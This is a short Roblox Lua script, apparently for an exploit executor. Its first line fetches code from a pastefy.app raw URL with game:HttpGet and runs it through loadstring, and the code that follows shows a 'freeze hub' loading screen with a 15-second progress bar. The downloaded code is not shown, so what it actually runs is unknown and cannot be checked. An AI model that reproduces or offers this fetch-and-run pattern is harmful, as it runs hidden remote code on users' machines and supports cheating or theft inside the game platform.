loadstring(game:HttpGet("https://pastefy.app/eZFvmGIe/raw", true))()
local gui = Instance.new("ScreenGui")
gui.Name = "FreezeHubLoading"
gui.Parent = game:GetService("CoreGui")

-- Background
local bg = Instance.new("Frame", gui)
bg.Size = UDim2.new(1,0,1,0)
bg.BackgroundColor3 = Color3.fromRGB(0,0,0)
bg.BackgroundTransparency = 0.4

-- Box (slightly smaller)
local box = Instance.new("Frame", bg)
box.Size = UDim2.new(0, 230, 0, 80)
box.Position = UDim2.new(0.5, -115, 0.5, -40)
box.BackgroundColor3 = Color3.fromRGB(15,15,15)
box.BorderSizePixel = 0

Instance.new("UICorner", box).CornerRadius = UDim.new(0,12)

-- Title (SMALL + BOLD)
local title = Instance.new("TextLabel", box)
title.Size = UDim2.new(1,0,0,35)
title.BackgroundTransparency = 1
title.Text = "freeze hub"
title.TextColor3 = Color3.new(1,1,1)
title.Font = Enum.Font.GothamBold
title.TextSize = 14 -- 🔥 smaller but bold

-- Progress BG
local barBG = Instance.new("Frame", box)
barBG.Size = UDim2.new(1,-30,0,5)
barBG.Position = UDim2.new(0,15,1,-22)
barBG.BackgroundColor3 = Color3.fromRGB(45,45,45)
barBG.BorderSizePixel = 0

Instance.new("UICorner", barBG).CornerRadius = UDim.new(1,0)

-- Progress Bar
local bar = Instance.new("Frame", barBG)
bar.Size = UDim2.new(0,0,1,0)
bar.BackgroundColor3 = Color3.fromRGB(0,170,255)
bar.BorderSizePixel = 0

Instance.new("UICorner", bar).CornerRadius = UDim.new(1,0)

-- Loading (15 seconds)
task.spawn(function()
	for i = 1,150 do
		bar.Size = UDim2.new(i/150,0,1,0)
		task.wait(0.1)
	end

	gui:Destroy()
end)
